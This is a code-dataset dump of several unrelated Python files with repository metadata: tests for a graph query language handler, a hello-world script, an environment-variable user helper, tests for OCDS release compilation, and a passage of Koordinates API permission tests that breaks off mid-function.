92c9d604eb7a4fc14dbdbc27a9565417808a696f
| 11,949
|
py
|
Python
|
test/test_script_handler.py
|
evgenyim/bsse-spring-2020-graph-BD
|
73e98918c9a7bebec866fd2c0e4d40dfe45e8c9d
|
[
"MIT"
] | 3
|
2020-02-20T17:34:23.000Z
|
2020-04-03T12:58:44.000Z
|
test/test_script_handler.py
|
evgenyim/bsse-spring-2020-graph-BD
|
73e98918c9a7bebec866fd2c0e4d40dfe45e8c9d
|
[
"MIT"
] | 1
|
2020-05-13T06:52:24.000Z
|
2020-05-13T06:52:24.000Z
|
test/test_script_handler.py
|
evgenyim/bsse-spring-2020-graph-BD
|
73e98918c9a7bebec866fd2c0e4d40dfe45e8c9d
|
[
"MIT"
] | 2
|
2020-02-20T17:38:14.000Z
|
2020-04-24T09:45:26.000Z
|
import tempfile
from src.script_handler import *
from src.cyk import cyk
def run_script(s):
temp = tempfile.NamedTemporaryFile()
f = open(temp.name, 'w')
f.write(s)
f.close()
return handle_script_from_file(temp.name)
def test_list_all_graphs(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'list all graphs;'.format(path + '/test_dir'))
lines = open(path + '/script_out.txt').read()
assert capsys.readouterr().out == lines
def test_named_pattern(capsys):
path = os.path.dirname(__file__) + '/resources'
h = run_script('connect to [{}];\n'
'S = a S b S | ();'.format(path + '/test_dir'))
assert h.g.rules == {'Q0': [['a', 'S', 'b', 'S'], ['eps']], 'S': [['Q0']]}
def test_named_pattern2():
h = run_script('S = a b + | ();')
assert cyk(h.g, 'a b')
assert cyk(h.g, 'a b b b b')
assert cyk(h.g, '')
assert not cyk(h.g, 'a')
def test_named_pattern3():
h = run_script('S = a ? b;')
assert cyk(h.g, 'a b')
assert cyk(h.g, 'b')
assert not cyk(h.g, 'a')
assert not cyk(h.g, 'a b b')
assert not cyk(h.g, 'a a b')
def test_named_pattern4():
h = run_script('S = (a b)* | c;')
assert cyk(h.g, 'a b')
assert cyk(h.g, 'a b a b')
assert cyk(h.g, 'c')
assert not cyk(h.g, 'a')
assert not cyk(h.g, 'a b b')
assert not cyk(h.g, 'a a b')
assert not cyk(h.g, 'a b c')
def test_select_exists(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select exists u from [graph.txt] where (u) - S -> (_);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'True\n'
def test_select_exists2(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select exists u from [graph.txt] where (_) - S -> (u);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'True\n'
def test_select_exists3(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select exists (u, v) from [graph.txt] where (u) - S -> (v);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'True\n'
def test_select_exists4(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S -> (v);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'True\n'
def test_select_exists5(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'True\n'
def test_select_exists6(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S -> (v.ID = 0);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'False\n'
def test_select_exists7(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a S| ();'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S b b b -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'True\n'
def test_select_exists8(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a S| ();'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'False\n'
def test_select_exists9(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a S | ();'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'
'S = a S b;'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == 'False\nTrue\n'
def test_select_exists10(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];'
'S = a S | ();'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S c c c -> (v.ID = 3);'
'connect to [{}];'
'select exists (u, v) from [graph.txt] where (u.ID = 1) - S c c c -> (v.ID = 3);'.format(path + '/test_dir', path + '/test_dir2'))
assert capsys.readouterr().out == 'False\nTrue\n'
def test_select_count(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select count u from [graph.txt] where (u) - S -> (_);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '3\n'
def test_select_count2(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select count u from [graph.txt] where (_) - S -> (u);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '2\n'
def test_select_count3(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select count (u, v) from [graph.txt] where (u) - S -> (v);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '6\n'
def test_select_count4(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select count (u, v) from [graph.txt] where (u.ID = 1) - S -> (v);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '2\n'
def test_select_count5(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select count (u, v) from [graph.txt] where (u.ID = 1) - S -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '1\n'
def test_select_count6(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select count (u, v) from [graph.txt] where (u.ID = 1) - S -> (v.ID = 0);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '0\n'
def test_select_count7(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a S| ();'
'select count (u, v) from [graph.txt] where (u.ID = 1) - S b b b -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '1\n'
def test_select_count8(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a S | ();'
'select count (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'
'S = a S b;'
'select count (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '0\n1\n'
def test_select_count9(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];'
'S = a S | ();'
'select count u from [graph.txt] where (u.ID = 1) - S c c c -> (v.ID = 3);'
'connect to [{}];'
'select count u from [graph.txt] where (u) - S c c c -> (v.ID = 3);'.format(path + '/test_dir', path + '/test_dir2'))
assert capsys.readouterr().out == '0\n3\n'
def test_select(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select u from [graph.txt] where (u) - S -> (_);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[0, 1, 2]\n'
def test_select2(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select u from [graph.txt] where (_) - S -> (u);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[2, 3]\n'
def test_select3(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select (u, v) from [graph.txt] where (u) - S -> (v);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[(0, 2), (0, 3), (1, 2), (1, 3), (2, 2), (2, 3)]\n'
def test_select4(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select (u, v) from [graph.txt] where (u.ID = 1) - S -> (v);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[(1, 2), (1, 3)]\n'
def test_select5(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select (u, v) from [graph.txt] where (u.ID = 1) - S -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[(1, 3)]\n'
def test_select6(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C;'
'C = S b;'
'select (u, v) from [graph.txt] where (u.ID = 1) - S -> (v.ID = 0);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[]\n'
def test_select7(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a S | ();'
'select (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'
'S = a S b;'
'select (u, v) from [graph.txt] where (u.ID = 1) - S b b -> (v.ID = 3);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[]\n[(1, 3)]\n'
def test_select8(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];'
'S = a S | ();'
'select u from [graph.txt] where (u.ID = 1) - S c c c -> (v.ID = 3);'
'connect to [{}];'
'select u from [graph.txt] where (u) - S c c c -> (v.ID = 3);'.format(path + '/test_dir', path + '/test_dir2'))
assert capsys.readouterr().out == '[]\n[0, 1, 2]\n'
def test_select9(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];'
'S = a S | ();'
'select u from [graph.txt] where (u.ID = 1) - a ? c + -> (v.ID = 3);'
'connect to [{}];'
'select u from [graph.txt] where (u) - a ? c + -> (v.ID = 3);'.format(path + '/test_dir', path + '/test_dir2'))
assert capsys.readouterr().out == '[]\n[1, 2, 3]\n'
def test_select10(capsys):
path = os.path.dirname(__file__) + '/resources'
run_script('connect to [{}];\n'
'S = a b | a C | ();'
'C = S b;'
'select u from [graph.txt] where (u) - S C -> (v.ID = 2);'.format(path + '/test_dir'))
assert capsys.readouterr().out == '[0, 1, 2, 3]\n'
| 37.224299
| 145
| 0.508578
| 1,733
| 11,949
| 3.354299
| 0.057703
| 0.012386
| 0.074316
| 0.105281
| 0.883881
| 0.871495
| 0.856528
| 0.847411
| 0.842766
| 0.840702
| 0
| 0.015332
| 0.290401
| 11,949
| 320
| 146
| 37.340625
| 0.670244
| 0
| 0
| 0.566265
| 0
| 0.124498
| 0.386894
| 0
| 0
| 0
| 0
| 0
| 0.188755
| 1
| 0.140562
| false
| 0
| 0.012048
| 0
| 0.156627
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1329574ae49892f27259e31f69cf16e3335a7b13
| 81
|
py
|
Python
|
helloworld.py
|
IamBloodHound/HelloWorld
|
f8c1dd2c6415af9f500f81859eb05ef15a6e613d
|
[
"MIT"
] | null | null | null |
helloworld.py
|
IamBloodHound/HelloWorld
|
f8c1dd2c6415af9f500f81859eb05ef15a6e613d
|
[
"MIT"
] | null | null | null |
helloworld.py
|
IamBloodHound/HelloWorld
|
f8c1dd2c6415af9f500f81859eb05ef15a6e613d
|
[
"MIT"
] | null | null | null |
# Sample Print Hello World Program
print('Hello World')
print('I am Blood Hound')
| 27
| 34
| 0.753086
| 13
| 81
| 4.692308
| 0.692308
| 0.327869
| 0.491803
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135802
| 81
| 3
| 35
| 27
| 0.871429
| 0.395062
| 0
| 0
| 0
| 0
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
132e4cdcfe93c0bdf3530806c27d8b228b9baa4c
| 199
|
py
|
Python
|
prvsnlib/utils/user.py
|
acoomans/prvsn
|
af6b313c2e779ae4e3a9cdba0b1c3a1f4b4c085e
|
[
"BSD-2-Clause"
] | null | null | null |
prvsnlib/utils/user.py
|
acoomans/prvsn
|
af6b313c2e779ae4e3a9cdba0b1c3a1f4b4c085e
|
[
"BSD-2-Clause"
] | null | null | null |
prvsnlib/utils/user.py
|
acoomans/prvsn
|
af6b313c2e779ae4e3a9cdba0b1c3a1f4b4c085e
|
[
"BSD-2-Clause"
] | null | null | null |
import os
def real_user():
if 'SUDO_USER' in os.environ.keys():
return os.environ['SUDO_USER']
else:
return os.environ['USER']
def real_home():
return os.environ['HOME']
| 19.9
| 40
| 0.623116
| 29
| 199
| 4.137931
| 0.448276
| 0.3
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.231156
| 199
| 10
| 41
| 19.9
| 0.784314
| 0
| 0
| 0
| 0
| 0
| 0.13
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.125
| 0.125
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
1342a61d73dd5792b1607213f40b76b1020cdc73
| 13,252
|
py
|
Python
|
tests/test_transform_compile_releases_from_records.py
|
matiasSanabria/kingfisher-process
|
88cb768aaa562714c8bd53e05717639faf041501
|
[
"BSD-3-Clause"
] | 1
|
2019-04-11T10:17:32.000Z
|
2019-04-11T10:17:32.000Z
|
tests/test_transform_compile_releases_from_records.py
|
matiasSanabria/kingfisher-process
|
88cb768aaa562714c8bd53e05717639faf041501
|
[
"BSD-3-Clause"
] | 282
|
2018-12-20T16:49:22.000Z
|
2022-02-01T00:48:10.000Z
|
tests/test_transform_compile_releases_from_records.py
|
matiasSanabria/kingfisher-process
|
88cb768aaa562714c8bd53e05717639faf041501
|
[
"BSD-3-Clause"
] | 7
|
2019-04-15T13:36:18.000Z
|
2021-03-02T16:25:41.000Z
|
import datetime
import os
import sqlalchemy as sa
from ocdskingfisherprocess.store import Store
from ocdskingfisherprocess.transform import TRANSFORM_TYPE_COMPILE_RELEASES
from ocdskingfisherprocess.transform.compile_releases import CompileReleasesTransform
from tests.base import BaseDataBaseTest
class TestTransformCompileReleasesFromRecords(BaseDataBaseTest):
def _setup_collections_and_data_run_transform(self, filename, load_a_second_time=False):
# Make source collection
source_collection_id = self.database.get_or_create_collection_id("test", datetime.datetime.now(), False)
source_collection = self.database.get_collection(source_collection_id)
# Load some data
store = Store(self.config, self.database)
store.set_collection(source_collection)
json_filename = os.path.join(os.path.dirname(
os.path.realpath(__file__)), 'fixtures', filename
)
store.store_file_from_local("test.json", "http://example.com", "record_package", "utf-8", json_filename)
if load_a_second_time:
store.store_file_from_local("test2.json", "http://example.com", "record_package", "utf-8", json_filename)
# Make destination collection
destination_collection_id = self.database.get_or_create_collection_id(
source_collection.source_id,
source_collection.data_version,
source_collection.sample,
transform_from_collection_id=source_collection_id,
transform_type=TRANSFORM_TYPE_COMPILE_RELEASES)
destination_collection = self.database.get_collection(destination_collection_id)
# transform! Nothing should happen because source is not finished
transform = CompileReleasesTransform(self.config, self.database, destination_collection)
transform.process()
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 0 == result.rowcount
# Mark source collection as finished
self.database.mark_collection_store_done(source_collection_id)
# transform! This should do the work.
transform = CompileReleasesTransform(self.config, self.database, destination_collection)
transform.process()
return source_collection_id, source_collection, destination_collection_id, destination_collection
def test_compiled_release(self):
source_collection_id, source_collection, destination_collection_id, destination_collection = \
self._setup_collections_and_data_run_transform('sample_1_1_record.json')
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# Check a couple of fields just to sanity check it's the compiled release in the record table
# Because releases are linked, the only way to get data is to take the compiled release
compiled_release = result.fetchone()
data = self.database.get_data(compiled_release['data_id'])
assert 'ocds-213czf-000-00001-2011-01-10T09:30:00Z' == data.get('id')
assert '2011-01-10T09:30:00Z' == data.get('date')
assert 'ocds-213czf-000-00001' == data.get('ocid')
# Check warnings
s = sa.sql.select([self.database.collection_file_item_table])\
.where(self.database.collection_file_item_table.c.id == compiled_release['collection_file_item_id'])
result_file_item = connection.execute(s)
assert 1 == result_file_item.rowcount
collection_file_item = result_file_item.fetchone()
assert collection_file_item.warnings == [
'This already had a compiledRelease in the record! It was passed through this transform unchanged.',
]
# Check collection notes
notes = self.database.get_all_notes_in_collection(destination_collection_id)
assert len(notes) == 0
# transform again! This should be fine
transform = CompileReleasesTransform(self.config, self.database, destination_collection)
transform.process()
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# destination collection should be closed
destination_collection = self.database.get_collection(destination_collection_id)
assert destination_collection.store_end_at is not None
def test_no_compiled_release_linked_records_so_cant_do_anything(self):
source_collection_id, source_collection, destination_collection_id, destination_collection = \
self._setup_collections_and_data_run_transform('sample_1_1_record_linked_releases_not_compiled.json')
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 0 == result.rowcount
# Check collection notes
notes = self.database.get_all_notes_in_collection(destination_collection_id)
assert len(notes) == 1
assert 'OCID ocds-213czf-000-00001 could not be compiled because at least one release in the releases ' +\
'array is a linked release or there are no releases with dates, ' +\
'and the record has neither a compileRelease nor a release with a tag of "compiled".' == \
notes[0].note
def test_transform_compiles(self):
# This data files has full releases and nothing else, so the transform should compile itself using ocdsmerge
source_collection_id, source_collection, destination_collection_id, destination_collection = \
self._setup_collections_and_data_run_transform('sample_1_1_record_releases_not_compiled.json')
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# Check a couple of fields just to sanity check we've compiled something here.
# The only way it could get data here is if it compiled it itself.
compiled_release = result.fetchone()
data = self.database.get_data(compiled_release['data_id'])
assert 'ocds-213czf-000-00001-2011-01-10T09:30:00Z' == data.get('id')
assert '2011-01-10T09:30:00Z' == data.get('date')
assert 'ocds-213czf-000-00001' == data.get('ocid')
# Check warnings
s = sa.sql.select([self.database.collection_file_item_table])\
.where(self.database.collection_file_item_table.c.id == compiled_release['collection_file_item_id'])
result_file_item = connection.execute(s)
assert 1 == result_file_item.rowcount
collection_file_item = result_file_item.fetchone()
assert collection_file_item.warnings is None
# Check collection notes
notes = self.database.get_all_notes_in_collection(destination_collection_id)
assert len(notes) == 0
# transform again! This should be fine
transform = CompileReleasesTransform(self.config, self.database, destination_collection)
transform.process()
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# destination collection should be closed
destination_collection = self.database.get_collection(destination_collection_id)
assert destination_collection.store_end_at is not None
def test_two_records_same_ocid(self):
source_collection_id, source_collection, destination_collection_id, destination_collection = \
self._setup_collections_and_data_run_transform(
'sample_1_1_record_releases_not_compiled.json',
load_a_second_time=True
)
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# Check a couple of fields just to sanity check it's the compiled release in the record table
# Because releases are linked, the only way to get data is to take the compiled release
compiled_release = result.fetchone()
data = self.database.get_data(compiled_release['data_id'])
assert 'ocds-213czf-000-00001-2011-01-10T09:30:00Z' == data.get('id')
assert '2011-01-10T09:30:00Z' == data.get('date')
assert 'ocds-213czf-000-00001' == data.get('ocid')
# Check warnings
s = sa.sql.select([self.database.collection_file_item_table]) \
.where(self.database.collection_file_item_table.c.id == compiled_release['collection_file_item_id'])
result_file_item = connection.execute(s)
assert 1 == result_file_item.rowcount
collection_file_item = result_file_item.fetchone()
assert collection_file_item.warnings == [
'There are multiple records for this OCID! The record to pass through was selected arbitrarily.',
]
# Check collection notes
notes = self.database.get_all_notes_in_collection(destination_collection_id)
assert len(notes) == 0
# transform again! This should be fine
transform = CompileReleasesTransform(self.config, self.database, destination_collection)
transform.process()
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# destination collection should be closed
destination_collection = self.database.get_collection(destination_collection_id)
assert destination_collection.store_end_at is not None
def test_no_dates(self):
source_collection_id, source_collection, destination_collection_id, destination_collection = \
self._setup_collections_and_data_run_transform('sample_1_1_record_releases_not_compiled_no_dates.json')
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 0 == result.rowcount
# Check collection notes
notes = self.database.get_all_notes_in_collection(destination_collection_id)
assert len(notes) == 1
assert 'OCID ocds-213czf-000-00001 could not be compiled ' +\
'because at least one release in the releases array is a ' +\
'linked release or there are no releases with dates, ' +\
'and the record has neither a compileRelease nor a release with a tag of "compiled".' == \
notes[0].note
def test_some_dates(self):
source_collection_id, source_collection, destination_collection_id, destination_collection = \
self._setup_collections_and_data_run_transform('sample_1_1_record_releases_not_compiled_some_dates.json')
# check
with self.database.get_engine().begin() as connection:
s = sa.sql.select([self.database.compiled_release_table])
result = connection.execute(s)
assert 1 == result.rowcount
# Check a couple of fields just to sanity check it's the compiled release in the record table
# Because releases are linked, the only way to get data is to take the compiled release
compiled_release = result.fetchone()
data = self.database.get_data(compiled_release['data_id'])
assert 'ocds-213czf-000-00001-2011-01-10T09:30:00Z' == data.get('id')
assert '2011-01-10T09:30:00Z' == data.get('date')
assert 'ocds-213czf-000-00001' == data.get('ocid')
# Check warnings
s = sa.sql.select([self.database.collection_file_item_table]) \
.where(self.database.collection_file_item_table.c.id == compiled_release['collection_file_item_id'])
result_file_item = connection.execute(s)
assert 1 == result_file_item.rowcount
collection_file_item = result_file_item.fetchone()
assert collection_file_item.warnings == [
'This OCID had some releases without a date element. We have compiled all other releases.']
# Check collection notes
notes = self.database.get_all_notes_in_collection(destination_collection_id)
assert len(notes) == 0
| 49.081481
| 117
| 0.68118
| 1,595
| 13,252
| 5.408777
| 0.114734
| 0.072331
| 0.046946
| 0.068854
| 0.8252
| 0.815811
| 0.811754
| 0.811754
| 0.811754
| 0.79286
| 0
| 0.025656
| 0.238228
| 13,252
| 269
| 118
| 49.263941
| 0.828925
| 0.111078
| 0
| 0.697143
| 0
| 0
| 0.138439
| 0.055802
| 0
| 0
| 0
| 0
| 0.234286
| 1
| 0.04
| false
| 0.011429
| 0.04
| 0
| 0.091429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1352d01f00a2fe2313cbdfdad47e75d66f994933
| 14,505
|
py
|
Python
|
tests/test_permissions.py
|
koordinates/python-client
|
7e60a183b5d1dbb8d45423040e1bf8c42a5c2d1e
|
[
"BSD-3-Clause"
] | 3
|
2015-10-26T06:38:02.000Z
|
2018-08-17T04:41:10.000Z
|
tests/test_permissions.py
|
koordinates/python-client
|
7e60a183b5d1dbb8d45423040e1bf8c42a5c2d1e
|
[
"BSD-3-Clause"
] | 21
|
2015-07-10T19:24:24.000Z
|
2020-09-22T01:44:20.000Z
|
tests/test_permissions.py
|
koordinates/python-client
|
7e60a183b5d1dbb8d45423040e1bf8c42a5c2d1e
|
[
"BSD-3-Clause"
] | 2
|
2015-08-24T17:47:20.000Z
|
2019-01-16T20:55:40.000Z
|
import pytest
from koordinates import Permission
from koordinates import Client, Group, User
from .response_data.responses_10 import (
layer_list_permissions_good_simulated_response,
layer_permission_simulated_response,
)
from .response_data.responses_10 import (
set_permission_simulated_response,
set_list_permissions_good_simulated_response,
)
from .response_data.responses_10 import (
source_permission_simulated_response,
source_list_permissions_good_simulated_response,
)
from .response_data.sources import source_detail
from .response_data.responses_5 import layers_version_single_good_simulated_response
from .response_data.responses_3 import sets_single_good_simulated_response
# FIXTURES
@pytest.fixture
def responses():
import responses
with responses.RequestsMock() as rsps:
yield rsps
@pytest.fixture
def client():
return Client(token="test", host="test.koordinates.com")
@pytest.fixture
def layer(responses, client):
responses.add(
responses.GET,
client.get_url("LAYER", "GET", "single", {"id": 1474}),
body=layers_version_single_good_simulated_response,
status=200,
content_type="application/json",
)
yield client.layers.get(1474)
@pytest.fixture
def set_(responses, client):
responses.add(
responses.GET,
client.get_url("SET", "GET", "single", {"id": 933}),
body=sets_single_good_simulated_response,
status=200,
content_type="application/json",
)
yield client.sets.get(933)
@pytest.fixture
def source(responses, client):
responses.add(
responses.GET,
client.get_url("SOURCE", "GET", "single", {"id": 21836}),
body=source_detail,
status=200,
content_type="application/json",
)
yield client.sources.get(21836)
# TESTS
def test_list_layer_permissions(responses, client, layer):
base_url = client.get_url("LAYER", "GET", "single", {"id": layer.id})
target_url = base_url + client.get_url_path("PERMISSION", "GET", "multi")
responses.add(
responses.GET,
target_url,
body=layer_list_permissions_good_simulated_response,
status=200,
content_type="application/json",
)
cnt_permissions_returned = 0
for obj in layer.permissions.list():
assert isinstance(obj, Permission)
assert isinstance(obj.group, Group)
assert obj.permission == "download"
assert obj.id == "group.everyone"
assert obj.group.id == 4
assert obj.group.name == "Everyone"
assert obj.group.url == "https://test.koordinates.com/services/api/v1/groups/4/"
cnt_permissions_returned += 1
assert cnt_permissions_returned == 1
def test_create_layer_permission(responses, client, layer):
base_url = client.get_url("LAYER", "GET", "single", {"id": layer.id})
target_url = base_url + client.get_url_path("PERMISSION", "POST", "single")
responses.add(
responses.POST,
target_url,
body=layer_permission_simulated_response,
status=201,
adding_headers={
"Location": "https://test.koordinates.com/services/api/v1/layers/%s/permissions/%s/"
% (layer.id, "108")
},
)
base_url = client.get_url("LAYER", "GET", "single", {"id": layer.id})
target_url = base_url + client.get_url_path(
"PERMISSION", "GET", "single", {"permission_id": 108}
)
responses.add(
responses.GET, target_url, body=layer_permission_simulated_response, status=200
)
permission = Permission()
permission.group = "108"
permission.permission = "download"
response = layer.permissions.create(permission)
assert response.id == permission.id
assert response.permission == permission.permission
assert isinstance(response, Permission)
assert isinstance(response.group, Group)
assert 108 == permission.group.id
def test_set_layer_permissions(responses, client, layer):
base_url = client.get_url("LAYER", "GET", "single", {"id": layer.id})
target_url = base_url + client.get_url_path("PERMISSION", "PUT", "multi")
responses.add(
responses.PUT,
target_url,
body=layer_list_permissions_good_simulated_response,
status=201,
)
base_url = client.get_url("LAYER", "GET", "single", {"id": layer.id})
target_url = base_url + client.get_url_path("PERMISSION", "GET", "multi")
responses.add(
responses.GET,
target_url,
body=layer_list_permissions_good_simulated_response,
status=200,
content_type="application/json",
)
data = [{"permission": "download", "group": "everyone"}]
for obj in layer.permissions.set(data):
assert isinstance(obj, Permission)
assert isinstance(obj.group, Group)
assert obj.permission == "download"
assert obj.id == "group.everyone"
def test_get_layer_permission(responses, client, layer):
base_url = client.get_url("LAYER", "GET", "single", {"id": layer.id})
target_url = base_url + client.get_url_path(
"PERMISSION", "GET", "single", {"permission_id": 108}
)
responses.add(
responses.GET, target_url, body=layer_permission_simulated_response, status=200
)
response = layer.permissions.get(108)
assert response.id == "group.108"
assert isinstance(response, Permission)
assert isinstance(response.group, Group)
assert 108 == response.group.id
def test_list_set_permissions(responses, client, set_):
base_url = client.get_url("SET", "GET", "single", {"id": set_.id})
target_url = base_url + client.get_url_path("PERMISSION", "GET", "multi")
responses.add(
responses.GET,
target_url,
body=set_list_permissions_good_simulated_response,
status=200,
content_type="application/json",
)
cnt_permissions_returned = 0
for obj in set_.permissions.list():
assert isinstance(obj, Permission)
assert obj.permission in ["admin", "view"]
if obj.group:
assert isinstance(obj.group, Group)
assert (
obj.group.url
== "https://test.koordinates.com/services/api/v1/groups/%s/"
% obj.group.id
)
elif obj.user:
assert isinstance(obj.user, User)
assert (
obj.user.url
== "https://test.koordinates.com/services/api/v1/users/%s/"
% obj.user.id
)
cnt_permissions_returned += 1
assert cnt_permissions_returned == 3
def test_create_set_permission(responses, client, set_):
base_url = client.get_url("SET", "GET", "single", {"id": set_.id})
target_url = base_url + client.get_url_path("PERMISSION", "POST", "single")
responses.add(
responses.POST,
target_url,
body=set_permission_simulated_response,
status=201,
adding_headers={
